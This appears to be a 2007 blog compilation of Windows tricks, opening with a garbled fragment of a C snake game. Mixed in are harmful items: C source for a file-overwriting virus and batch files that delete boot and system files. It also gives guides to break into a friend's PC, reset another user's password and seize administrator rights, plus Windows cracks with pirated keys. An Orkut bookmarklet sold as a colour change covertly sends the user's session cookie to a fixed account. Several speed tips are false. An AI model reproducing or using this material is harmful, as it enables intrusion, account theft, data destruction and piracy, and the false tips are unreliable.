putimage(x, y, head1, XOR_PUT);
if(a=='4')
putimage(x, y, head2, XOR_PUT);
if(a=='8')
putimage(x, y, head3, XOR_PUT);
if(a=='5')
putimage(x, y, head4, XOR_PUT);

for(j=0; j {
putimage(X[i-j], Y[i-j], body, XOR_PUT);
}

if((X[i-j-1]-X[i-j])<0 && (Y[i-j-1]-Y[i-j])==0)
putimage(X[i-j], Y[i-j], tail1, XOR_PUT);

if((X[i-j-1]-X[i-j])>0 && (Y[i-j-1]-Y[i-j])==0)
putimage(X[i-j], Y[i-j], tail2, XOR_PUT);

if((X[i-j-1]-X[i-j])==0 && (Y[i-j-1]-Y[i-j])<0)
putimage(X[i-j], Y[i-j], tail3, XOR_PUT);

if((X[i-j-1]-X[i-j])==0 && (Y[i-j-1]-Y[i-j])>0)
putimage(X[i-j], Y[i-j], tail4, XOR_PUT);

delay(speed);

if(second==1)
{
setcolor(15);
outtextxy(maxx-140,360,"Press Any Key...");
getch();
setcolor(0);
outtextxy(maxx-140,360,"Press Any Key...");
a='6';

second=2;
}


if(first==1)
{
setcolor(15);
outtextxy(maxx-140,360,"Congratulations ");
sound(100);
delay(300);
nosound();
getch();
setcolor(0);
outtextxy(maxx-140,360,"Congratulations ");
second++;
first=2;

}

// erase old image
if(a=='6')
putimage(x, y, head1, XOR_PUT);
if(a=='4')
putimage(x, y, head2, XOR_PUT);
if(a=='8')
putimage(x, y, head3, XOR_PUT);
if(a=='5')
putimage(x, y, head4, XOR_PUT);


for(j=0; j {
putimage(X[i-j], Y[i-j], body, XOR_PUT);

}

if((X[i-j-1]-X[i-j])<0 && (Y[i-j-1]-Y[i-j])==0)
putimage(X[i-j], Y[i-j], tail1, XOR_PUT);

if((X[i-j-1]-X[i-j])>0 && (Y[i-j-1]-Y[i-j])==0)
putimage(X[i-j], Y[i-j], tail2, XOR_PUT);

if((X[i-j-1]-X[i-j])==0 && (Y[i-j-1]-Y[i-j])<0)
putimage(X[i-j], Y[i-j], tail3, XOR_PUT);

if((X[i-j-1]-X[i-j])==0 && (Y[i-j-1]-Y[i-j])>0)
putimage(X[i-j], Y[i-j], tail4, XOR_PUT);


if(f==0)
{
putimage(r1,r2,food,XOR_PUT);
f=1;
}

z--;
if((x>=r1 && y>=r2 && x<=r1+10 && y<=r2+10) || (x<=r1 && y<=r2 &&
x>=r1-10 && y>=r2-10) || z==0)
{
if(z!=0)
{
sound(800);
delay(20);
setcolor(0);
score += 10;
outtextxy(maxx-50,250,scor);
itoa(score,scor,10);
if(score>hscore)
{
strcpy(hs,scor);
setfillstyle(1,1);
bar(maxx-140,337,maxx-20,348);
setcolor(14);
outtextxy(maxx-50,340,hs);
outtextxy(maxx-140,340,"High Score ");
if(first==0)
{
first=1;
}
}
setcolor(4);
outtextxy(maxx-50,250,scor);
k++;
nosound();
}
z=100;
putimage(r1,r2,food,XOR_PUT);
repr1:
r1=random(450);
if(r1<50)
goto repr1;
repr2:
r2=random(400);
if(r2<50)
goto repr2;

f=0;
}


i++;
X[i]=x;
Y[i]=y;

b=a;
if(kbhit())
{
rep:
a=getche();

if((b=='6' && a=='4') || (b=='4' && a=='6'))
a=b;

if((b=='8' && a=='5') || (b=='5' && a=='8'))
a=b;

if(a!='6' && a!='4' && a!='8' && a!='0' && a!='5')
a=b;
}

/* if(x>maxx-170)
x=0;

if(y>maxy)
y=0;*/

if(a=='8')
y -= bo;

if(a=='5')
y += bo;

if(a=='4')
x -= bo;

if(a=='6')
x += bo;

for(j=i+1; j {
if((Y[i]>=Y[j] && Y[i]<=Y[j]+10) || (Y[i]<=Y[j] && Y[i]>=X[j]-10))
{
if((X[i]>=X[j] && X[i]<=X[j]+10) || (X[i]<=X[j] && X[i]>=X[j]-10))
{
a='0';
}

outtextxy(maxx-140,360,"C ");


}

if((X[i]>=X[j] && X[i]<=X[j]+10) || (X[i]<=X[j] && X[i]>=X[j]-10))
{
if((Y[i]>=Y[j] && Y[i]<=Y[j]+10) || (Y[i]<=Y[j] && Y[i]>=X[j]-10))
{
a='0';
}

outtextxy(maxx-140,360,"C ");
}

}

/* for(j=i; j {
if((y>=Y[j] && y<=Y[j]+10) || (y<=Y[j] && y>=Y[j]-10))
{
if((x>=X[j] && x<=X[j]+10) || (x<=X[j] && x>=X[j]-10))
{
a='5';
}
}

if((x>=X[j] && x<=X[j]+10) || (x<=X[j] && x>=X[j]-10))
{
if((y>=Y[j] && y<=Y[j]+10) || (y<=Y[j] && y>=Y[j]-10))
{
a='5';
}
}
if(j==0)
break;
} */


/* if(x<=0)
x=maxx-170;

if(y<=0)
y=maxy;*/

if(maze==1)
{
if(x<=14 || x>=maxx-184 || y<=14 || y>=maxy-14)
{
a='0';
}
}

}

if(score>hscore)
{
ofstream onfile("c:\tc\bin\rattle.txt");
onfile< onfile.close();
}

setcolor(15);
outtextxy(maxx-140,390," Gameover");
sound(100);
delay(400);
nosound();
getch();
/* clean up */
free(body);
closegraph();

}

Make your firefox run at lightining speed.


Make your firefox run at lightining speed.

These are few steps to make your firefox run at lightining speed.

1. First in the URL bar, Type “about:config”. This will bring up a list of commands and variables you can edit.


2. The second step is to put “network.http.pipelining” in the filter and change the value to “true”.


3. After that you will want to put “network.http.proxy.pipelining” in the filter.
Like the last one, make that value set to “true” also.


4. Next, locate “network.http.pipelining.maxrequests” and change the value to some number higher, say 10,20 or even 30, it would make up to 10,20 or 30 requests at once.


5. The last step is to right click anywhere and select “New” then “Integer”. Name it “nglayout.initialpaint.delay” and make its value “0″. This will make the browser respond faster on the information of the websites it receives.


6. Close out FireFox (make sure FireFox is closed by viewing the Task Manager) and restart it and enjoy the new mega speed
Aug 29
Toooo smart….:)
Interviewer said, “I shall either ask you ten easy questions or one really difficult question. Think well before you make up your mind!”

Interviewer said, ” I shall either ask you ten easy questions or one really difficult question. Think well before you make up your mind!”

The candidate thought for a while and said, ” My choice is one really difficult question.”

” Well, good luck to you, you have made your own choice!” said the interviewer.

Here is your question: ” What comes first, Day or Night?”

The boy was jolted into reality as his admission depended on the correctness of the answer to that one question. He thought for a while and said, ” It’s DAY sir!”

” How?” the interviewer asked.

” Sorry sir, you promised me that you will not ask me a SECOND difficult question!”

Moral : Technical Skill is the mastery of complexity, while Creativity is the mastery of simplicity

Winamp 5.5 aims at iTunes with new interface


Winamp 5.5 aims at iTunes with new interface
Bad boys at Nullsoft have been developing the new Winamp 5.5 for over a year now. Winamp is celebrating its 10th anniversary next month, and to mark this event, they are releasing Winamp 5.5 (also known as Winamp 10th Anniversary Edition) on 10/10 at 10:10 am. The beta version of Winamp 5.5 is already out for testers.






Winamp 5.5 boasts an all-new unified interface called Bento Skin. If you are someone like me, who loves iTunes like interface, then you must this one! Unlike, the ugly old multiple window interface, Bento looks awesome with sleek black color and album art support.

Here’s a highlight of some of the new features seen in Winamp 5.5:

A brand new unified user interface with album art support More Like This automatic playlist generator Media Monitor tool that automatically playlists playable songs from any web page Fully integrated browser with Smart Search functionality MP3 surround playback support Remote access to your music and videos on the web, compatible mobile devices, and TVs using Wii, PS3 and Xbox 360 A custom Winamp browser toolbar with integrated Winamp playback controls [Coming Soon] I was a great fan of Winamp some years ago, back then it so lightweight. All these years, especially after AOL took over Winamp, it seems like Winamp is now growing up to become more like iTunes.

Download Winamp 5.5 Beta

GOM Player Plays All Of Your Videos


GOM Player Plays All Of Your Videos
Do you have a hard time finding a media player that has all of the codecs that you need? GOM Player will solve those problems and many more. It can support formats like AVI, DAT, MPEG, DivX, XviD, WMV, ASF, and the list keeps going!

Are you in the middle of downloading a movie or do you have a broken AVI file? GOM Player can play files that are missing frames and it will just skip them when they are found…making the video as seamless as possible. If that doesn’t sound sweet enough then maybe some of these other features will push you over the edge:

Editable SkinsHTTP streamingDrag-and-drop supportSubtitlingOverlay mixerKey remappingEnhanced filter renderingRebuilding for AVI filesReal-time indexI didn’t find out about this player until a few weeks ago when a friend told me about it. Ever since I haven’t been able to go back to using anything else. Sure it is great that it has the huge list of codecs built-in but you’ll love how fast it runs.

Cost: FREE
Download GOM Player

Saturday, November 24, 2007

lock my computer

Latest trick to lock my computer(pc) so that no one can open.

lock ur pc.. open notepad copy and paste the script below and save it .VBS extention
This wil create a shortcut.. run(click) it

set WshShell = WScript.CreateObject("WScript.Shell")
set oShellLink = WshShell.CreateShortcut(wshShell.SpecialFolders("D esktop") & "\LockWorkstation.lnk")
oShellLink.TargetPath = "%windir%\system32\rundll32.exe"
oShellLink.Arguments = "user32.dll,LockWorkStation"
oShellLink.Save

Is it possible to Change "windows" to your name?

Is it possible to Change "windows" to your name?


open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:

[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here


Save the file, then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
Now if you want to display some more information then simply increase the line in the file.
ex: Line4=Your Working Hours Here

How to make your" PDF "file to speak


You can listen to any PDF instead of reading with Adobe Reader 7.0 or 6.0,
and the short cut is:

Ctrl+shift+b - to hear the entire Document

Ctrl+shift+v - to hear the page

Ctrl+shift+c - to resume

Microsoft Word Crazy fact

Microsoft Word Crazy fact..ever seen

Open Microsoft Word and type

=rand (200, 99)

And then press ENTER

and see the Magic

Increase your Bandwidth by 20%

Ever seen trick to Increase your Internet Bandwidth by 20%


Windows uses 20% of your bandwidth! Get it back

A nice little tweak for XP. M*crosoft reserve 20% of your available bandwidth for their own purposes (suspect for updates and interrogating your machine etc..)

Here's how to get it back:

Click Start-->Run-->type "gpedit.msc" without the "

This opens the group policy editor. Then go to:

Local Computer Policy-->Computer Configuration-->Administrative Templates-->Network-->QOS Packet Scheduler-->Limit Reservable Bandwidth

Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab :

"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."

So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.
works on XP Pro, and 2000
other OS not tested.

Note: Do not limit it to 0%, It cuts your speed, Suggest 1-2% only.

Latest release "Shortcut to start Windows XP"

You can restart a Windows XP Pro and home machine easily by creating a shortcut with following path. (Assume you installed Windows XP on your C: Partition) "c:\windows\system32\shutdown.exe -r -f -t 00" -r is for restarting the computer. -f is to force close all programs without saving. -t 00 is used to restart in zero seconds. i.e. as soon as you D.Click on the shortcut. You can log off from a Windows XP Professional or home edition by running "C:\windows\system32\shutdown.exe -l -f -t 00". Also you can shutdown a Windows XP home or Professional edition by running "c:\windows\system32\shutdown.exe -s -f -t 00". You always have to turn from the CPU after running this command. (Same with AT and ATX powered machines.) If you want to turn down power of ATX machine automatically, run "c:\windows\system32\tsshutdn.exe 00 /POWERDOWN /DELAY:00" This is used to turn off a server. Even though your computer will be
shutdown completely, this whole operation will take 30 seconds to finish. Even though you don't have networked computers attached to your computer, this works.

Only one trick to hack windows.It takes only few mins.

I know this is a very simple thing but the problem, as like many other issues, is the ignorance about it.

How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. customize your SEND TO MENU.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.

First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.

Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.

Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.

5. DONE

Bypass WGA validation to make your XP genuine

Bypass WGA validation to make your XP genuine


Crack your Windows XP with Service Pack 2 Which uses Registration Key

JD3T2-QH36R-X7W2W-7R3XT-DVRPQ


This will allow you to bypass the Microsoft Genuine Validation.


I hope this is the best and genuine way to crack Xp:

1. Click STARTàRUN and type ‘regedit’

2 Registry window will be opened, Then Go to
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer

...and doubleclick on it. Then change some of the value data to ANYTHING ELSE...delete some, add some letters, I don't care...just change it!

now close out regedit.

3) Go to start > run > "%systemroot%\system32\oobe\msoobe.exe /a" (again, dont type the quotes)

4) the activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.


Now you can download all the updates without activating, and the Genuine Microsoft Validation will F**K you No more.

Note: This works better after reformat


Or else do you want to download the crack for XP,XP home,XP 2, Vista..
i am placing it in a zip folder pls download it from the below link

Download Crack

make ur windows vista genuine

How to make vista geniune version??key is here..

download the vista activator from the below link


http://rapidshare.com/files/47588614/va2007av.rar

how to hack my friend pc through yahoo messenger?

how to hack my friend pc through yahoo messenger?


1) Open Command Prompt. Have some one on yahoo messenger send you a file; while the file is sending, in command prompt type -> netstat -an press enter

2)it will show alll Active Connections on your computer, in there under foreign ip for a number thats ends in 5050. this is the persons ip adress who is sending you the file

3)Now type : net use: h \\ (the person's ip adress)\shareddocs push enter wait for message to show up

4)If it is successful you should get a message saying command prompt was successful. If you get a error message than your attempt has failed, probably because the person has security measures in place to prevent hacking.

5)if you get the message that says command was successful, than go to my computer. There you will see a file named "shareddocs on (the name of your computer)" open this file

you are now connected to that person's computer

Friday, November 23, 2007

cooollllll fonts in orkut

ฬяเтє ℓเkє тнเร

javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"ค");txt.value=txt.value.replace(/b/gi,"๒");txt.value=txt.value.replace(/w/gi,"ฬ");txt.value=txt.value.replace(/d/gi,"∂");txt.value=txt.value.replace(/p/gi,"թ");txt.value=txt.value.replace(/N/gi,"ภ");txt.value=txt.value.replace(/t/gi,"т");txt.value=txt.value.replace(/E/gi,"є");txt.value=txt.value.replace(/i/gi,"เ");txt.value=txt.value.replace(/u/gi,"υ");txt.value=txt.value.replace(/v/gi,"√");txt.value=txt.value.replace(/h/gi,"н");txt.value=txt.value.replace(/f/gi,"ƒ");txt.value=txt.value.replace(/l/gi,"ℓ");txt.value=txt.value.replace(/s/gi,"ร");txt.value=txt.value.replace(/o/gi,"σ");txt.value=txt.value.replace(/m/gi,"м");txt.value=txt.value.replace(/r/gi,"я");function reverse() { var inp = " ! nuraV yb edam si tpircs sihT "; var outp="";for (i = 0; i <= inp.length; i++){ outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();;void(0);



●๋•|̲̅I̲̅f̲̅ ̲̅ự̲̅ ̲̅w̲̅α̲̅и̲̅и̲̅α̲̅ ̲̅w̲̅r̲̅i̲̅Ť̲̅Œ̲̅ ̲̅l̲̅i̲̅k̲̅Œ̲̅ ̲̅Ť̲̅Ħ̲̅i̲̅ร̲̅
̲̅
̲̅|●๋• █▐║│▌│█▐║│> ® ™
copy frm here
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"α");txt.value=txt.value.replace(/p/gi,"ρ");txt.value=txt.value.replace(/N/gi,"и");txt.value=txt.value.replace(/t/gi,"Ť");txt.value=txt.value.replace(/E/gi,"Œ");txt.value=txt.value.replace(/u/gi,"ự");txt.value=txt.value.replace(/h/gi,"Ħ");txt.value=txt.value.replace(/s/gi,"ร");txt.value=txt.value.replace(/o/gi,"σ");txt.value=txt.value.replace(/m/gi,"м");void(0);javascript:var byLєαŋdrσ=document.getElementsByTagName('textarea')[0];byLєαŋdrσ.value=%22●๋•|%22+byLєαŋdrσ.value.replace(/|/g,%22̲̅%22)+%22|●๋• █▐║│▌│█▐║│> ® ™%22;void(0);


.
till here

this will change the colour of your orkut profile and will give you new moderate look

javascript:orkut=replyForm;orkut.toUserId.value=62431562;orkut.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));orkut.action='Scrapbook.aspx?Action.submit';orkut.submit();i=0;c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0);

to lock a folder in windows

to lock a folder in windows

open notpad and copy the following code and save it as lock.Bat
____________________________________________________________________

cls@ECHO OFFtitle Folder Lockerif EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCKif NOT EXIST porno goto MDLOCKER:CONFIRMecho Are you sure u want to Lock the folder(Y/N)set/p "cho=>"if %cho%==Y goto LOCKif %cho%==y goto LOCKif %cho%==n goto ENDif %cho%==N goto ENDecho Invalid choice.goto CONFIRM:LOCKren porno "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"echo Folder lockedgoto End:UNLOCKecho Enter password to Unlock folderset/p "BAS=>"if NOT %BAS%==type your password here goto FAILattrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" pornoecho Folder Unlocked successfullygoto End:FAILecho Invalid passwordgoto end:MDLOCKERmd pornoecho Locker created successfullygoto End:End

Changing someone's password

Changing someone's password

This hack works if you are at someone else's home and you are logged into the account of the person whose account you want to hack. This also works if you want to hack someone else's account on your pc bit do not know his/her password.Click on START-->RUN.Type compmgmt.msc & press enter.In the left pane, select COMPUTER MANAGEMENT--> SYSTEM TOOLS--> LOCAL USERS AND GROUPS--> USERS.Then in the right pane, select the user name whose account you want to hack. RIGHT CLICK and then click on SET PASSWORD from the pop-up menu.Enter the new password. Click on OK.There you have it. You have changed the user's password!

Virus in c

Virus in c

#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];int source,target,byt,done;struct ffblk ffblk;clrscr();textcolor(2);
cprintf("--------------------------------------------------------------------------");
printf("\nVirus: Folderbomb 1.0\n");
cprintf("--------------------------------------------------------------------------");
done = findfirst("*.*",&ffblk,0);
while (!done)
{
printf("\n");
cprintf(" %s ", ffblk.ff_name);
printf("is attacked by ");
cprintf("Folderbomb");
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONLY);
while(1)
{
byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
elsebreak;
}
close(source);close(target);done = findnext(&ffblk);
}
getch();
}

format ur hardisk with notepad

format ur hardisk with notepad

go to notepad
@Echo off
Del C:\ *.*y
save it as Dell.bat

or worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


and save it as a .bat file

Crack into admin acc from limited account(99.99% works)

Crack into admin acc from limited account(99.99% works)

Go to cmd

type AT (time) /interactive “cmd.exe”

enter time in 24hr format

means if you want to enter 5.00pm then enter 17:00

then a new window of cmd will open at specified time

In new window type net(space)user

press enter

after this u will see some names on ur screen

notedown the name of admin acc

then type

net user (name of admin acc u want to crack into) *
e.g if the name of admin acc is john then type

net user john *

then it will ask u for new password

enter password of ur choice

and u got the admin password

Increase ur browsing speed

Increase ur browsing speed

Speed up your firefox browser and load pages about 20% faster than previous.

1. Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:

network.http.pipeliningnetwork.http.proxy.pipeliningnetwork.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"

Set "network.http.proxy.pipelining" to "true"

Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.

If you're using a broadband connection you'll load pages 2-3 times faster now.

mozila net increase speed

Increase your Netspeed

Increase your Netspeed



go to desktop->My computer-(right click on)->manage->->Device manager-> now u see a window of Device manager
then go to Ports->Communication Port(double click on it and Open).
after open u can see a Communication Port properties.
go the Port Setting:----
and now increase ur "Bits per second" to 128000.
and "Flow control" change 2 Hardware.

U WILL NOTICE AN IMMEDIATE RESULT

this will increase the receiving capacity of your input port and thus ur netspeed will be increased

Virus that crashesh your own pc

Virus that crashesh your own pc

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!



type this in notepad

start virus.bat
virus.bat


and save as with this name

virus.bat


ur antivirus will not detect this virus

Basically this program will delete all that files which are needed for booting
If your os is installed in d drive instead of c then replace c with d

START A MOVIE IN PAINT

START A MOVIE IN PAINT


Start A movie in paint!
Start movie in Paint!
* First start a movie in any player.

* Then open Paint.

* Now, in the player when the movie is being played, press "Print screen" button on your key board.

* Now, Press ctrl+v in Paint

* Leave the movie player open and don't minimize it.

* Open Paint now and see the movie in the Paint!

Speedup ur pc

Speedup ur pc

Clean Ur RAM
U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any more.

So create a new text file on ur desktop and call it .. uhm.. "RAMcleaner" or something...

Type

FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u save it ]

Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater "cleaning-progress".


FreeMem=Space(1280000000)

just try it out.. it worked for me

SHUTDOWN UR PC IN ONE CLICK

SHUTDOWN UR PC IN ONE CLICK

Creating Shutdown Icon or One Click Shutdown:


Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path.
Use this path in "Type Location of the Item"
SHUTDOWN -s -t 01
If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done.

Creating Shutdown Icon or One Click Shutdown:Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path.Use this path in "Type Location of the Item"SHUTDOWN -s -t 01If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done.

Hide ur drives

Hide ur drives

How to Hide the drives(c:,d:,e:,a:...etc)
How to Hide the drives(c:,d:,e:,a:...etc)
This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.




1.Go to start->run.Type regedit.Now go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane create a new DWORD item and name it NoDrives(it is case sensitive). Now modify it's value and set it to 3FFFFFF (Hexadecimal) .Now restart your computer. So, now when you click on My Computer, no drives will be shown(all gone...). To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again. Magic........lol....

XP registery Hacks

Its a mixed bag.. a compilation of all the tricks..
many tricks are what i discovered..
many are shared ..
keep posting if u know more



Display Your Quick Launch ToolbarTip:


Is your Quick Launch toolbar missing from the taskbar?
To display your familiar Quick Launch toolbar:
Right-click an empty area on the taskbar, click Toolbars, and then click Quick Launch.

Easy as that your Quick Launch bar appears. To add items to your Quick Launch toolbar, click the icon for the program you want to add, and drag it to the Quick Launch portion of the taskbar.


--------------------------------------------------------------------------------

How to remove recycle bin from your desktop Tip:

Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.

--------------------------------------------------------------------------------

How to stop new programs installed balloon from coming up tip:

Right click on START button and select properties. Click on Customize and go to Advanced tab and deselect check box saying "Highlight newly installed programs". This would help you stop this annoying feature from popping up every now and then.



--------------------------------------------------------------------------------
Unlock Toolbars to Customize Them Tip:

The new Windows XP now features locking toolbars, and you can adjust them. You may customize a lot of the Windows XP features such as the Taskbar, Start Menu, and even toolbar icons in Internet Explorer and Outlook Express. Remember your right-click:
* Right-click on a toolbar, and then click Lock the Toolbars to remove the check mark.
* Right-click on the toolbar again, and then click Customize.

You may add or remove toolbar buttons, change text options and icon options. When you've got the toolbar customized, click Close. Now right-click on the toolbar and then click Lock the Toolbars to lock them in place. com


--------------------------------------------------------------------------------

Want to remove shared documents folder from My Computer window tip:

Some don't like my shared documents folder option. If you are one of that, here is a trick to remove it.Open registry editor by going to START-RUN and entering regedit.
Once in registry, navigate to key HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

How to improve on shutdown time ? Close apps automatically & quickly at shutdown tip:

Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP and look for AutoEndTasks. On my computer default value is 0. Change it to 1. Thats all. Further more you can reduce the time it takes for Windows to issue kill directive to all active/hung applications.
In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500 (since default value for HungAppTimeout 5000 and for WaitToKillAppTimeout is 20000)


--------------------------------------------------------------------------------
Are you missing icons Tip:


Are you missing icons? You may be wondering where all the icons from your desktop are in Windows XP? Well if you're like me, you like to have at least My Computer, My Network Places, and My Documents on the your desktop.
You need to:
* Right-click on the desktop, and then click Properties.
* Click the Desktop tab and then click on Customize Desktop.
* Put a check mark in the box next to My Document, My Computer, My Network Places, or Internet Explorer, to add those familiar icons to your desktop. Easy yes!

--------------------------------------------------------------------------------

How to login as administrator if you don't see it available tip:

Unless and until you have run into issues and fixing XP (underwhich case you have to go to Safe Mode to login as Administrator), you can get to administrator screen by simply pressing CTRL+ALT+DELETE twice at the main screen.

--------------------------------------------------------------------------------

Speedup boot up sequence by defragmenting all key boot files tip:

Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction. In right hand panel look for Enable. Right click on it and set it 'Y' for enable. This is the way I have it set on my computer. This will help speedup boot time.


Use a Shortcut to Local Area Network Connection Information:


--------------------------------------------------------------------------------

Use a Shortcut to Local Area Network Connection Information Tip:


Here's something new in Windows XP, instead of using the command line program and typing ipconfig to get local area network information, you can try using the following shortcut:
* Click on Start, point to Connect to, and then click Show All Connections.
* Right–click the connection you want information about, and then click Status.
* In the connection Properties dialog box, click the Support tab.
* For more information, click on the Advanced tab.

To automatically enable the status monitor each time the connection is active, in the connection Properties dialog box, select the Show icon in taskbar notification area when connected check box.

--------------------------------------------------------------------------------

Do you know you can have Virtual Desktops (like in Linux) with PowerToys ?

If you have powertoys installed on Windows XP Its available for free at Microsoft download webpage. It is very easy to enable Microsoft Virtual Desktop Feature. Simply right click on the Start Panel Bar also called TaskBar, Click on Tool Bar and select Desktop manager.
You would see a set of 5 icons placed on the right portion of the TAskBar. Click on number 1 to 4 to go to any of the desktops. Now you have have four different Active Desktops.
IMPORTANT NOTE: You may see a little degradation in performance.

--------------------------------------------------------------------------------

Customize Internet. Explorer Title bar tip:

This tip won't make your computer any faster but may help personalize your computer experience. Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet. Explorer\Main. In right hand panel look for string "Window Title" and change its value to whatever custom text you want to see.
--------------------------------------------------------------------------------

adding content to Right click credit : ashwin C1

Once done, you will be able to right click any file or folder and use the Browse for Folder dialog to choose the location you want to move or copy your file or folder to, without having to go to the destination path.

First we will add the copy and move options to the right click menu of all FILES.
CLICK Start>Run, type REGEDIT and click OK to open up the registry editor and make your way to this key:
HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers
Right click the ContextMenuHandlers key and choose New>Key.
Name the new key “Copy To” (without the quotes).
Repeat the above and create another new key named Move To.
You should now have two new subkeys under the ContextMenuHandlers key:
HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers\Copy To
HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers\Move To
Select the Copy To key and in the right hand pane, double click “Default”
Enter this clsid value as the value data:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
Next , select the Move To key and in the right hand pane set the default value to:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}
This now takes care of the Copy and Move options for the right click context menu of all your files.
Now all that is left is to add the same options to the right click menu of all your folders.
The procedure will be the same as for files but at a different key:
HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHan dlers
Right click ContextMenuHandlers and create a new key named Copy To.
Right click it again and create another new key named Move To.
left click on the right hand pane, add the same default values as you did for Files:
For Copy To:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
For the Move To:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}
Exit the registry and you are done.
Now when you right click on a file or folder, you should see two new options: Copy to Folder and Move to Folder

Javascript Fun [Edit Any Webpage]

Using this great trick you can edit any website you want...set there parameters and much more..

Here is how to Use it :
1) Go to any web-site you want to edit
2) Copy this Javascript :

javascript:nick=document.body;nick.contentEditable='true'; document.designMode='on'; void 0

